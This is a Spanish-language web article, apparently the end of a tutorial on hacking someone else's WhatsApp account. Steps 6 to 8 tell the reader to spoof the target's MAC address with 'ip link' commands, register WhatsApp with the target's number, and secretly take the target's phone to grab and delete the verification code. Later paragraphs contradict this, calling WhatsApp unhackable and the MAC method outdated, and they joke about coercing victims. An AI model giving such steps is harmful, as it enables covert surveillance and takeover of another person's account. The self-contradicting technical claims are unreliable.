Paso. 6 Ahora abra la aplicación, en la terminal, escriba ” ip link show ” para ver una lista de interfaces. Identifique el que tiene su dirección MAC; para este ejemplo, utilizaremos la interfaz eth0. En el emulador de terminal, ingrese ” Dirección de conjunto de enlaces IP eth0 XX: XX: XX: XX: XX: XX ” y ” Conjunto de enlaces ip eth0 broadcast XX: XX: XX: XX: XX: XX “, donde eth0 es la interfaz identificado y XX: XX: XX: XX: XX: XX es la dirección MAC de su objetivo. Para comprobar que ha cambiado correctamente su dirección MAC, ingrese ” iplink show eth0 “.

Paso. 7 Instale WhatsApp en su teléfono pero no ingrese su número de teléfono, ingrese el número de teléfono de su objetivo para configurar WhatsApp en lugar del suyo. Ahora tome el teléfono del objetivo por segunda y última vez para recibir el código de verificación de WhatsApp, después de obtener ese código, elimine ese mensaje del teléfono móvil del objetivo. Ahora todas las tareas han sido realizadas DISFRUTA !!
Paso. 8 Cuando ya no necesite acceder a la cuenta de WhatsApp de su objetivo, cambie su dirección MAC de nuevo a lo que era. Siguiendo el mismo método que el anterior.

Hay dos partes del pirateo

  1. obtener acceso pasivo (capacidad de leer mensajes)
  2. obtener acceso activo (capacidad de enviar mensajes)

En lo que respecta al primero, debería ser difícil hacerlo, ya que WhatsApp utiliza cifrado de extremo a extremo, es decir, los mensajes se cifran en su dispositivo y se descifran en otro dispositivo. Tenga en cuenta que he usado debería, porque es posible obtener acceso fácilmente mediante el uso de WhatsApp web, pero requiere acceso físico al dispositivo. Otra posibilidad es que Whatsapp haya dejado deliberadamente / por error algunas lagunas para que alguien acceda.

Ahora, para la segunda posibilidad, se requiere que alguien haga que los servidores de WhatsApp crean que “es” el dispositivo real. Considero que esto es altamente improbable, pero podría ser posible.


Sin embargo, en su mayor parte, no se permite que nadie acceda a su dispositivo, o al menos a la aplicación de WhatsApp, es todo lo que hay que hacer para proteger su cuenta.

Supongo que la mayoría de la gente piensa que es posible piratear cualquier cosa escribiendo algunos comandos crípticos en la computadora en pocos minutos. La realidad no es tan simple. Por supuesto, hay kiddies de script que confían en tutoriales en línea para obtener acceso a algo realmente mal asegurado (como el wifi del albergue con la contraseña como nombre del propietario), pero piratear un sistema seguro no es tan fácil *


El * se usa porque, bueno, a veces puedes amenazar u obligar a alguien a dar acceso.

Debido al cifrado de extremo a extremo de Whatsapp, es imposible hackearlo. Además, el uso de Whatsapp utiliza el cifrado crypt8 para almacenar mensajes localmente. para descifrar crypt8 requerimos la clave privada asociada con la cuenta particular. que solo se puede obtener si el móvil está enraizado (solo funciona con Android).

Entonces, ninguno de los métodos que se sabe que funcionan para hackear WhatsApp. El desafío más grande es que WhatsApp puede ejecutar solo una sesión, por lo que no hay posibilidad de iniciar sesión en otro dispositivo sin previo aviso del usuario.

Recientemente, WhatsApp cambió su proceso de autenticación y agregaron muchas técnicas para autenticar el dispositivo, anteriormente solo se validaba la dirección MAC para iniciar sesión. Ahora están validando el número de serie. , mac, ID del dispositivo, nombre del dispositivo, qué no todo en el build.prop. Por lo tanto, clonar la aplicación con datos tampoco funcionará.